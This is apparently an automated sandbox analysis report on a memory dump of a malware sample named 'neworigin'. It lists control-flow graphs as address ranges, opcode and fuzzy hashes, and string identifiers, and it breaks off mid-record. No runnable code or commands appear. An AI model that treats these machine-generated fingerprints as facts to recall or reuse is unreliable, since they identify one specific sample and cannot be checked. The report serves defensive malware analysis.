                                                                                                              control_flow_graph 131 6a93178-6a93199 132 6a9319b-6a9319e 131->132 133 6a931a0-6a931bf 132->133 134 6a931c4-6a931c7 132->134 133->134 135 6a93968-6a9396a 134->135 136 6a931cd-6a931ec 134->136 138 6a9396c 135->138 139 6a93971-6a93974 135->139 144 6a931ee-6a931f1 136->144 145 6a93205-6a9320f 136->145 138->139 139->132 140 6a9397a-6a93983 139->140 144->145 146 6a931f3-6a93203 144->146 149 6a93215-6a93224 145->149 146->149 257 6a93226 call 6a93998 149->257 258 6a93226 call 6a93990 149->258 150 6a9322b-6a93230 151 6a9323d-6a9351a 150->151 152 6a93232-6a93238 150->152 173 6a9395a-6a93967 151->173 174 6a93520-6a935cf 151->174 152->140 183 6a935f8 174->183 184 6a935d1-6a935f6 174->184 186 6a93601-6a93614 183->186 184->186 188 6a9361a-6a9363c 186->188 189 6a93941-6a9394d 186->189 188->189 192 6a93642-6a9364c 188->192 189->174 190 6a93953 189->190 190->173 192->189 193 6a93652-6a9365d 192->193 193->189 194 6a93663-6a93739 193->194 206 6a9373b-6a9373d 194->206 207 6a93747-6a93777 194->207 206->207 211 6a93779-6a9377b 207->211 212 6a93785-6a93791 207->212 211->212 213 6a937f1-6a937f5 212->213 214 6a93793-6a93797 212->214 215 6a937fb-6a93837 213->215 216 6a93932-6a9393b 213->216 214->213 217 6a93799-6a937c3 214->217 228 6a93839-6a9383b 215->228 229 6a93845-6a93853 215->229 216->189 216->194 224 6a937d1-6a937ee 217->224 225 6a937c5-6a937c7 217->225 224->213 225->224 228->229 231 6a9386a-6a93875 229->231 232 6a93855-6a93860 229->232 236 6a9388d-6a9389e 231->236 237 6a93877-6a9387d 231->237 232->231 235 6a93862 232->235 235->231 241 6a938a0-6a938a6 236->241 242 6a938b6-6a938c2 236->242 238 6a9387f 237->238 239 6a93881-6a93883 237->239 238->236 239->236 243 6a938a8 241->243 244 6a938aa-6a938ac 241->244 246 6a938da-6a9392b 242->246 247 6a938c4-6a938ca 242->247 243->242 244->242 246->216 248 6a938cc 247->248 249 6a938ce-6a938d0 247->249 248->246 249->246 257->150 258->150
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $q$$q$$q$$q$$q$$q
                                                                                                              • API String ID: 0-2069967915
                                                                                                              • Opcode ID: a68f37ade6bb91c7110a688b698492f97ffe2d3097f5e54957d77674a558bf97
                                                                                                              • Instruction ID: e3523ed4f54cc3b88f28f32efbfa620d4ec3b1fb703c6fce9577dc519ff5a1c9
                                                                                                              • Opcode Fuzzy Hash: a68f37ade6bb91c7110a688b698492f97ffe2d3097f5e54957d77674a558bf97
                                                                                                              • Instruction Fuzzy Hash: 6D322E31E107198FDF14EF69C85069DB7F2BF99300F60C6A9E449AB254EF70A985CB90

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 932 6a97e78-6a97e96 933 6a97e98-6a97e9b 932->933 934 6a97e9d-6a97eab 933->934 935 6a97eb2-6a97eb5 933->935 943 6a97ead 934->943 944 6a97f1e-6a97f34 934->944 936 6a97ec2-6a97ec5 935->936 937 6a97eb7-6a97ec1 935->937 938 6a97ee8-6a97eeb 936->938 939 6a97ec7-6a97ee3 936->939 941 6a97eed-6a97f07 938->941 942 6a97f0c-6a97f0e 938->942 939->938 941->942 945 6a97f10 942->945 946 6a97f15-6a97f18 942->946 943->935 950 6a97f3a-6a97f43 944->950 951 6a9814f-6a98159 944->951 945->946 946->933 946->944 954 6a97f49-6a97f66 950->954 955 6a9815a-6a9818f 950->955 964 6a9813c-6a98149 954->964 965 6a97f6c-6a97f94 954->965 958 6a98191-6a98194 955->958 960 6a983c9-6a983cc 958->960 961 6a9819a-6a981a9 958->961 962 6a983ef-6a983f2 960->962 963 6a983ce-6a983ea 960->963 973 6a981c8-6a9820c 961->973 974 6a981ab-6a981c6 961->974 966 6a983f8-6a98404 962->966 967 6a9849d-6a9849f 962->967 963->962 964->950 964->951 965->964 985 6a97f9a-6a97fa3 965->985 976 6a9840f-6a98411 966->976 970 6a984a1 967->970 971 6a984a6-6a984a9 967->971 970->971 971->958 975 6a984af-6a984b8 971->975 983 6a9839d-6a983b3 973->983 984 6a98212-6a98223 973->984 974->973 979 6a98429-6a9842d 976->979 980 6a98413-6a98419 976->980 988 6a9843b 979->988 989 6a9842f-6a98439 979->989 986 6a9841b 980->986 987 6a9841d-6a9841f 980->987 983->960 997 6a98229-6a98246 984->997 998 6a98388-6a98397 984->998 985->955 991 6a97fa9-6a97fc5 985->991 986->979 987->979 990 6a98440-6a98442 988->990 989->990 995 6a98453-6a9848c 990->995 996 6a98444-6a98447 990->996 1002 6a97fcb-6a97ff5 991->1002 1003 6a9812a-6a98136 991->1003 995->961 1015 6a98492-6a9849c 995->1015 996->975 997->998 1009 6a9824c-6a98342 call 6a96698 997->1009 998->983 998->984 1016 6a97ffb-6a98023 1002->1016 1017 6a98120-6a98125 1002->1017 1003->964 1003->985 1065 6a98350 1009->1065 1066 6a98344-6a9834e 1009->1066 1016->1017 1024 6a98029-6a98057 1016->1024 1017->1003 1024->1017 1029 6a9805d-6a98066 1024->1029 1029->1017 1031 6a9806c-6a9809e 1029->1031 1038 6a980a9-6a980c5 1031->1038 1039 6a980a0-6a980a4 1031->1039 1038->1003 1041 6a980c7-6a9811e call 6a96698 1038->1041 1039->1017 1040 6a980a6 1039->1040 1040->1038 1041->1003 1067 6a98355-6a98357 1065->1067 1066->1067 1067->998 1068 6a98359-6a9835e 1067->1068 1069 6a9836c 1068->1069 1070 6a98360-6a9836a 1068->1070 1071 6a98371-6a98373 1069->1071 1070->1071 1071->998 1072 6a98375-6a98381 1071->1072 1072->998
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $q$$q
                                                                                                              • API String ID: 0-3126353813
                                                                                                              • Opcode ID: bfb75b3dbb5b6980883d2b60c676ba1a5f4eaec2d9e7cd91520d602703e387e9
                                                                                                              • Instruction ID: 30debdf071a84280d352550c83e6c16fecd7ef5ea3c5dbb5882e53ed17a8937f
                                                                                                              • Opcode Fuzzy Hash: bfb75b3dbb5b6980883d2b60c676ba1a5f4eaec2d9e7cd91520d602703e387e9
                                                                                                              • Instruction Fuzzy Hash: 59026C31B002158FDF54EB68D990AAEB7F6BF89300F248929D4159B354DB75EC82CBA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8b051d64c8fc96782f4465b57b51f8e19c7adc137d2ca9005716ee0e4afc486c
                                                                                                              • Instruction ID: 4202584d3bd1aa2ffb7c6229e74165d6b10aba94113aa8dc517b9f3be0992408
                                                                                                              • Opcode Fuzzy Hash: 8b051d64c8fc96782f4465b57b51f8e19c7adc137d2ca9005716ee0e4afc486c
                                                                                                              • Instruction Fuzzy Hash: FFA24434A102049FDFA4EB68C594B9DB7F2EB49314F6484A9D409AF361DB34ED85CFA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c86b6c64f5af6314b6e4a5f943ade8ed699fa7c8d21c41ca9b9a9772fd301a3c
                                                                                                              • Instruction ID: e4f0d6ed5fd3ec011b78bce225227f0ed229cec9711b8e807c2a1bab18b3c184
                                                                                                              • Opcode Fuzzy Hash: c86b6c64f5af6314b6e4a5f943ade8ed699fa7c8d21c41ca9b9a9772fd301a3c
                                                                                                              • Instruction Fuzzy Hash: 4B62AC34A102049FEF54EB68D594BADB7F2EF89310F248969E406DB354DB35EC46CBA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 492a8ba09f64d45ce4d25032fc449f4203649d655686a113032b137cb6ca003d
                                                                                                              • Instruction ID: 82e8881df8fcfb5d9e616b87a4f9e692a88098c7be071bf9533fa949315288c4
                                                                                                              • Opcode Fuzzy Hash: 492a8ba09f64d45ce4d25032fc449f4203649d655686a113032b137cb6ca003d
                                                                                                              • Instruction Fuzzy Hash: BE325D75B106089FDF54EB68D990BAEB7F2EB88320F208525E506DB355DB35EC41CBA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 410d7fc41187440439f96208eb890fc663b9619fb9f69655c5f996f71c822ac8
                                                                                                              • Instruction ID: c4cce96432fdffad10c4d6d75109d63ffb76065cde6ff31e8ca9adb10b92eed6
                                                                                                              • Opcode Fuzzy Hash: 410d7fc41187440439f96208eb890fc663b9619fb9f69655c5f996f71c822ac8
                                                                                                              • Instruction Fuzzy Hash: B812C231E002159FDF65EB68D8857AEBBF2EF85310F248829D9159F384DA34EC45CBA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 48edec6233eb084266cea73bf9244ded275ff91009b2e05e2697528df7585f9c
                                                                                                              • Instruction ID: a7223401a2318ecd76b8eeccd123e5f4640748d022d3cdcade9626fb3af59cd7
                                                                                                              • Opcode Fuzzy Hash: 48edec6233eb084266cea73bf9244ded275ff91009b2e05e2697528df7585f9c
                                                                                                              • Instruction Fuzzy Hash: 74224A74E102098BEF64EB68E4907AEB7F2FB89310F608526E445DB795CA34DC81CB71

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 0 6a9add0-6a9adee 1 6a9adf0-6a9adf3 0->1 2 6a9adf5-6a9ae11 1->2 3 6a9ae16-6a9ae19 1->3 2->3 4 6a9afed-6a9aff6 3->4 5 6a9ae1f-6a9ae22 3->5 9 6a9affc-6a9b006 4->9 10 6a9ae37-6a9ae40 4->10 7 6a9ae32-6a9ae35 5->7 8 6a9ae24-6a9ae2d 5->8 7->10 11 6a9ae4f-6a9ae52 7->11 8->7 12 6a9b007-6a9b011 10->12 13 6a9ae46-6a9ae4a 10->13 15 6a9ae6c-6a9ae6f 11->15 16 6a9ae54-6a9ae67 11->16 20 6a9b013-6a9b019 12->20 21 6a9afb4-6a9afbb 12->21 13->11 18 6a9ae71-6a9ae7e 15->18 19 6a9ae83-6a9ae86 15->19 16->15 18->19 22 6a9ae88-6a9ae8d 19->22 23 6a9ae90-6a9ae93 19->23 26 6a9b01b-6a9b02e 20->26 27 6a9afbc-6a9afc1 20->27 38 6a9afc3-6a9afe3 21->38 22->23 28 6a9ae95-6a9ae99 23->28 29 6a9aea4-6a9aea6 23->29 31 6a9b02f-6a9b03e 26->31 27->31 27->38 28->9 32 6a9ae9f 28->32 33 6a9aea8 29->33 34 6a9aead-6a9aeb0 29->34 35 6a9b040-6a9b043 31->35 32->29 33->34 34->1 37 6a9aeb6-6a9aeda 34->37 39 6a9b045-6a9b061 35->39 40 6a9b066-6a9b069 35->40 57 6a9afea 37->57 58 6a9aee0-6a9aeef 37->58 38->57 39->40 41 6a9b06b-6a9b06f 40->41 42 6a9b076-6a9b079 40->42 46 6a9b08f-6a9b0ca 41->46 47 6a9b071 41->47 48 6a9b07b-6a9b085 42->48 49 6a9b086-6a9b089 42->49 59 6a9b2bd-6a9b2d0 46->59 60 6a9b0d0-6a9b0dc 46->60 47->42 49->46 50 6a9b2f2-6a9b2f5 49->50 55 6a9b304-6a9b306 50->55 56 6a9b2f7 call 6a9b32a 50->56 61 6a9b308 55->61 62 6a9b30d-6a9b310 55->62 65 6a9b2fd-6a9b2ff 56->65 57->4 68 6a9aef1-6a9aef7 58->68 69 6a9af07-6a9af42 call 6a96698 58->69 66 6a9b2d2 59->66 73 6a9b0fc-6a9b140 60->73 74 6a9b0de-6a9b0f7 60->74 61->62 62->35 67 6a9b316-6a9b320 62->67 65->55 75 6a9b2d3 66->75 71 6a9aef9 68->71 72 6a9aefb-6a9aefd 68->72 87 6a9af5a-6a9af71 69->87 88 6a9af44-6a9af4a 69->88 71->69 72->69 91 6a9b15c-6a9b19b 73->91 92 6a9b142-6a9b154 73->92 74->66 75->75 100 6a9af89-6a9af9a 87->100 101 6a9af73-6a9af79 87->101 89 6a9af4c 88->89 90 6a9af4e-6a9af50 88->90 89->87 90->87 97 6a9b1a1-6a9b27c call 6a96698 91->97 98 6a9b282-6a9b297 91->98 92->91 97->98 98->59 109 6a9af9c-6a9afa2 100->109 110 6a9afb2 100->110 103 6a9af7b 101->103 104 6a9af7d-6a9af7f 101->104 103->100 104->100 111 6a9afa4 109->111 112 6a9afa6-6a9afa8 109->112 110->21 111->110 112->110
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $q$$q$$q$$q$$q$$q$$q$$q
                                                                                                              • API String ID: 0-3886557441
                                                                                                              • Opcode ID: efbfc3209fad50f57e3fc15586dc65e14224ed1991c946659997ef8f022cbea7
                                                                                                              • Instruction ID: 32e5772fbcee331a16dde8880b10ebdc0737a55137b688b685febc4a0324bca9
                                                                                                              • Opcode Fuzzy Hash: efbfc3209fad50f57e3fc15586dc65e14224ed1991c946659997ef8f022cbea7
                                                                                                              • Instruction Fuzzy Hash: 8EE18F31F102198FDF64EB68D4906AEB7F2FF89304F20852AD506AB344DB759C46CBA1

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 259 6a9b760-6a9b782 260 6a9b784-6a9b787 259->260 261 6a9b789-6a9b78d 260->261 262 6a9b7ae-6a9b7b1 260->262 263 6a9b793-6a9b7a3 261->263 264 6a9bb05-6a9bb3e 261->264 265 6a9b7c8-6a9b7cb 262->265 266 6a9b7b3-6a9b7b7 262->266 274 6a9b7a9 263->274 275 6a9b936-6a9b93a 263->275 276 6a9bb40-6a9bb43 264->276 268 6a9b7cd-6a9b7cf 265->268 269 6a9b7d2-6a9b7d5 265->269 266->264 267 6a9b7bd-6a9b7c3 266->267 267->265 268->269 272 6a9b7e2-6a9b7e5 269->272 273 6a9b7d7-6a9b7dd 269->273 277 6a9b7f9-6a9b7fc 272->277 278 6a9b7e7-6a9b7eb 272->278 273->272 274->262 275->264 281 6a9b940-6a9b950 275->281 282 6a9bb45-6a9bb61 276->282 283 6a9bb66-6a9bb69 276->283 279 6a9b802-6a9b805 277->279 280 6a9bad5-6a9bad6 277->280 278->264 284 6a9b7f1-6a9b7f4 278->284 285 6a9b869-6a9b86c 279->285 286 6a9b807-6a9b864 call 6a96698 279->286 287 6a9badb-6a9bade 280->287 305 6a9ba9a-6a9ba9e 281->305 306 6a9b956 281->306 282->283 288 6a9bb6f-6a9bb97 283->288 289 6a9bdd5-6a9bdd7 283->289 284->277 290 6a9b87c-6a9b87f 285->290 291 6a9b86e-6a9b877 285->291 286->285 294 6a9bae8-6a9baea 287->294 295 6a9bae0-6a9bae5 287->295 340 6a9bb99-6a9bb9c 288->340 341 6a9bba1-6a9bbe5 288->341 292 6a9bdd9 289->292 293 6a9bdde-6a9bde1 289->293 298 6a9b8a1-6a9b8a4 290->298 299 6a9b881-6a9b89c 290->299 291->290 292->293 293->276 300 6a9bde7-6a9bdf0 293->300 303 6a9baec 294->303 304 6a9baf1-6a9baf4 294->304 295->294 311 6a9b8ae-6a9b8b1 298->311 312 6a9b8a6-6a9b8a9 298->312 299->298 303->304 304->260 310 6a9bafa-6a9bb04 304->310 305->264 313 6a9baa0-6a9bab0 305->313 307 6a9b95b-6a9b95e 306->307 314 6a9b978-6a9b97b 307->314 315 6a9b960-6a9b966 307->315 319 6a9b8c1-6a9b8c4 311->319 320 6a9b8b3-6a9b8bc 311->320 312->311 313->280 334 6a9bab2 313->334 322 6a9b97d-6a9b981 314->322 323 6a9b992-6a9b995 314->323 315->264 321 6a9b96c-6a9b973 315->321 325 6a9b903-6a9b906 319->325 326 6a9b8c6-6a9b8db 319->326 320->319 321->314 322->264 327 6a9b987-6a9b98d 322->327 323->280 330 6a9b99b-6a9b99e 323->330 328 6a9b908-6a9b911 325->328 329 6a9b916-6a9b919 325->329 326->264 345 6a9b8e1-6a9b8fe 326->345 327->323 328->329 336 6a9babc-6a9bac5 329->336 337 6a9b91f-6a9b922 329->337 338 6a9b9b0-6a9b9b3 330->338 339 6a9b9a0 330->339 342 6a9bab7-6a9baba 334->342 343 6a9bacb 336->343 344 6a9ba0a-6a9ba13 336->344 346 6a9b931-6a9b934 337->346 347 6a9b924-6a9b92a 337->347 349 6a9b9c5-6a9b9c8 338->349 350 6a9b9b5-6a9b9c0 338->350 356 6a9b9a8-6a9b9ab 339->356 340->300 377 6a9bbeb-6a9bbf4 341->377 378 6a9bdca-6a9bdd4 341->378 342->336 351 6a9bad0-6a9bad3 342->351 343->351 344->264 354 6a9ba19-6a9ba20 344->354 345->325 346->275 346->307 347->315 355 6a9b92c 347->355 352 6a9b9d9-6a9b9dc 349->352 353 6a9b9ca-6a9b9ce 349->353 350->349 351->280 351->287 359 6a9b9ec-6a9b9ef 352->359 360 6a9b9de-6a9b9e7 352->360 353->320 358 6a9b9d4 353->358 362 6a9ba25-6a9ba28 354->362 355->346 356->338 358->352 359->347 365 6a9b9f5-6a9b9f8 359->365 360->359 362->280 366 6a9ba2e-6a9ba31 362->366 368 6a9b9fa-6a9ba00 365->368 369 6a9ba05-6a9ba08 365->369 370 6a9ba33-6a9ba4f 366->370 371 6a9ba54-6a9ba57 366->371 368->369 369->344 369->362 370->371 374 6a9ba59-6a9ba6e 371->374 375 6a9ba95-6a9ba98 371->375 374->264 384 6a9ba74-6a9ba90 374->384 375->305 375->342 380 6a9bbfa-6a9bc66 call 6a96698 377->380 381 6a9bdc0-6a9bdc5 377->381 393 6a9bc6c-6a9bc71 380->393 394 6a9bd60-6a9bd75 380->394 381->378 384->375 396 6a9bc8d 393->396 397 6a9bc73-6a9bc79 393->397 394->381 400 6a9bc8f-6a9bc95 396->400 398 6a9bc7b-6a9bc7d 397->398 399 6a9bc7f-6a9bc81 397->399 401 6a9bc8b 398->401 399->401 402 6a9bcaa-6a9bcb7 400->402 403 6a9bc97-6a9bc9d 400->403 401->400 410 6a9bcb9-6a9bcbf 402->410 411 6a9bccf-6a9bcdc 402->411 404 6a9bd4b-6a9bd5a 403->404 405 6a9bca3 403->405 404->393 404->394 405->402 406 6a9bcde-6a9bceb 405->406 407 6a9bd12-6a9bd1f 405->407 417 6a9bced-6a9bcf3 406->417 418 6a9bd03-6a9bd10 406->418 419 6a9bd21-6a9bd27 407->419 420 6a9bd37-6a9bd44 407->420 413 6a9bcc1 410->413 414 6a9bcc3-6a9bcc5 410->414 411->404 413->411 414->411 423 6a9bcf5 417->423 424 6a9bcf7-6a9bcf9 417->424 418->404 421 6a9bd29 419->421 422 6a9bd2b-6a9bd2d 419->422 420->404 421->420 422->420 423->418 424->418
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $q$$q$$q$$q$$q$$q
                                                                                                              • API String ID: 0-2069967915
                                                                                                              • Opcode ID: 9433ecb95a670053ee1847cca5533251626c3cdac9a35a1eb59216098b785796
                                                                                                              • Instruction ID: 6351182f9c1377fe41f1949cf2af21253857c0990790bf00f815f4effbdd1902
                                                                                                              • Opcode Fuzzy Hash: 9433ecb95a670053ee1847cca5533251626c3cdac9a35a1eb59216098b785796
                                                                                                              • Instruction Fuzzy Hash: 9C023930E102098FDF64EF68E5906AEB7F1FB49310F20892AD415DB395DB74E885CBA1

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 427 6a99250-6a99275 428 6a99277-6a9927a 427->428 429 6a99b38-6a99b3b 428->429 430 6a99280-6a99295 428->430 431 6a99b3d-6a99b5c 429->431 432 6a99b61-6a99b63 429->432 437 6a992ad-6a992c3 430->437 438 6a99297-6a9929d 430->438 431->432 434 6a99b6a-6a99b6d 432->434 435 6a99b65 432->435 434->428 439 6a99b73-6a99b7d 434->439 435->434 444 6a992ce-6a992d0 437->444 440 6a9929f 438->440 441 6a992a1-6a992a3 438->441 440->437 441->437 445 6a992e8-6a99359 444->445 446 6a992d2-6a992d8 444->446 457 6a9935b-6a9937e 445->457 458 6a99385-6a993a1 445->458 447 6a992da 446->447 448 6a992dc-6a992de 446->448 447->445 448->445 457->458 463 6a993cd-6a993e8 458->463 464 6a993a3-6a993c6 458->464 469 6a993ea-6a9940c 463->469 470 6a99413-6a9942e 463->470 464->463 469->470 475 6a99430-6a9944c 470->475 476 6a99453-6a99461 470->476 475->476 477 6a99471-6a994eb 476->477 478 6a99463-6a9946c 476->478 484 6a99538-6a9954d 477->484 485 6a994ed-6a9950b 477->485 478->439 484->429 489 6a9950d-6a9951c 485->489 490 6a99527-6a99536 485->490 489->490 490->484 490->485
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $q$$q$$q$$q
                                                                                                              • API String ID: 0-4102054182
                                                                                                              • Opcode ID: 02317efc7cb6338a7193f6244a03004bfbf78b5936d1b845119f8be61e81f927
                                                                                                              • Instruction ID: ce2afead56bce744afd84a4d8ad4d0008f184ba70745e3e58510d75e33b798d3
                                                                                                              • Opcode Fuzzy Hash: 02317efc7cb6338a7193f6244a03004bfbf78b5936d1b845119f8be61e81f927
                                                                                                              • Instruction Fuzzy Hash: C1919071B002199FDF64EB68D860BAF77F6BF89300F648569C409AB345EB709D41CBA0

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 493 6a9d060-6a9d07b 494 6a9d07d-6a9d080 493->494 495 6a9d0c9-6a9d0cc 494->495 496 6a9d082-6a9d0c4 494->496 497 6a9d0ce-6a9d110 495->497 498 6a9d115-6a9d118 495->498 496->495 497->498 500 6a9d13b-6a9d13e 498->500 501 6a9d11a-6a9d136 498->501 502 6a9d14d-6a9d150 500->502 503 6a9d140-6a9d142 500->503 501->500 507 6a9d199-6a9d19c 502->507 508 6a9d152-6a9d161 502->508 505 6a9d549 503->505 506 6a9d148 503->506 516 6a9d54c-6a9d558 505->516 506->502 514 6a9d1ab-6a9d1ae 507->514 515 6a9d19e-6a9d1a0 507->515 512 6a9d170-6a9d17c 508->512 513 6a9d163-6a9d168 508->513 517 6a9da7d-6a9dab6 512->517 518 6a9d182-6a9d194 512->518 513->512 522 6a9d1b0-6a9d1f2 514->522 523 6a9d1f7-6a9d1fa 514->523 520 6a9d407-6a9d410 515->520 521 6a9d1a6 515->521 524 6a9d1fc-6a9d20b 516->524 525 6a9d55e-6a9d84b 516->525 544 6a9dab8-6a9dabb 517->544 518->507 528 6a9d41f-6a9d42b 520->528 529 6a9d412-6a9d417 520->529 521->514 522->523 523->524 530 6a9d243-6a9d246 523->530 531 6a9d21a-6a9d226 524->531 532 6a9d20d-6a9d212 524->532 705 6a9d851-6a9d857 525->705 706 6a9da72-6a9da7c 525->706 537 6a9d53c-6a9d541 528->537 538 6a9d431-6a9d445 528->538 529->528 533 6a9d248-6a9d28a 530->533 534 6a9d28f-6a9d292 530->534 531->517 540 6a9d22c-6a9d23e 531->540 532->531 533->534 545 6a9d2db-6a9d2de 534->545 546 6a9d294-6a9d2d6 534->546 537->505 538->505 564 6a9d44b-6a9d45d 538->564 540->530 554 6a9dabd-6a9dad9 544->554 555 6a9dade-6a9dae1 544->555 551 6a9d2e8-6a9d2eb 545->551 552 6a9d2e0-6a9d2e5 545->552 546->545 559 6a9d2ed-6a9d32f 551->559 560 6a9d334-6a9d337 551->560 552->551 554->555 561 6a9daf0-6a9daf3 555->561 562 6a9dae3 call 6a9dbd5 555->562 559->560 560->516 569 6a9d33d-6a9d340 560->569 570 6a9daf5-6a9db21 561->570 571 6a9db26-6a9db28 561->571 575 6a9dae9-6a9daeb 562->575 580 6a9d45f-6a9d465 564->580 581 6a9d481-6a9d483 564->581 576 6a9d389-6a9d38c 569->576 577 6a9d342-6a9d384 569->577 570->571 578 6a9db2a 571->578 579 6a9db2f-6a9db32 571->579 575->561 583 6a9d38e-6a9d3d0 576->583 584 6a9d3d5-6a9d3d8 576->584 577->576 578->579 579->544 588 6a9db34-6a9db43 579->588 590 6a9d469-6a9d475 580->590 591 6a9d467 580->591 599 6a9d48d-6a9d499 581->599 583->584 593 6a9d3da-6a9d3f0 584->593 594 6a9d3f5-6a9d3f7 584->594 610 6a9dbaa-6a9dbbf 588->610 611 6a9db45-6a9dba8 call 6a96698 588->611 596 6a9d477-6a9d47f 590->596 591->596 593->594 600 6a9d3f9 594->600 601 6a9d3fe-6a9d401 594->601 596->599 620 6a9d49b-6a9d4a5 599->620 621 6a9d4a7 599->621 600->601 601->494 601->520 611->610 627 6a9d4ac-6a9d4ae 620->627 621->627 627->505 631 6a9d4b4-6a9d4d0 call 6a96698 627->631 644 6a9d4df-6a9d4eb 631->644 645 6a9d4d2-6a9d4d7 631->645 644->537 647 6a9d4ed-6a9d53a 644->647 645->644 647->505 707 6a9d859-6a9d85e 705->707 708 6a9d866-6a9d86f 705->708 707->708 708->517 709 6a9d875-6a9d888 708->709 711 6a9d88e-6a9d894 709->711 712 6a9da62-6a9da6c 709->712 713 6a9d8a3-6a9d8ac 711->713 714 6a9d896-6a9d89b 711->714 712->705 712->706 713->517 715 6a9d8b2-6a9d8d3 713->715 714->713 718 6a9d8e2-6a9d8eb 715->718 719 6a9d8d5-6a9d8da 715->719 718->517 720 6a9d8f1-6a9d90e 718->720 719->718 720->712 723 6a9d914-6a9d91a 720->723 723->517 724 6a9d920-6a9d939 723->724 726 6a9d93f-6a9d966 724->726 727 6a9da55-6a9da5c 724->727 726->517 730 6a9d96c-6a9d976 726->730 727->712 727->723 730->517 731 6a9d97c-6a9d993 730->731 733 6a9d9a2-6a9d9bd 731->733 734 6a9d995-6a9d9a0 731->734 733->727 739 6a9d9c3-6a9d9dc call 6a96698 733->739 734->733 743 6a9d9eb-6a9d9f4 739->743 744 6a9d9de-6a9d9e3 739->744 743->517 745 6a9d9fa-6a9da4e 743->745 744->743 745->727
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $q$$q$$q
                                                                                                              • API String ID: 0-3067366958
                                                                                                              • Opcode ID: 2cfc2f02c47149ed8d6e335af7b0f94fc46a2f2b20c006773cc4140500b969ac
                                                                                                              • Instruction ID: df56ca155ba68e1c1c6710b7741aa1213ae7fd2f8b272af76fdd37867cccb680
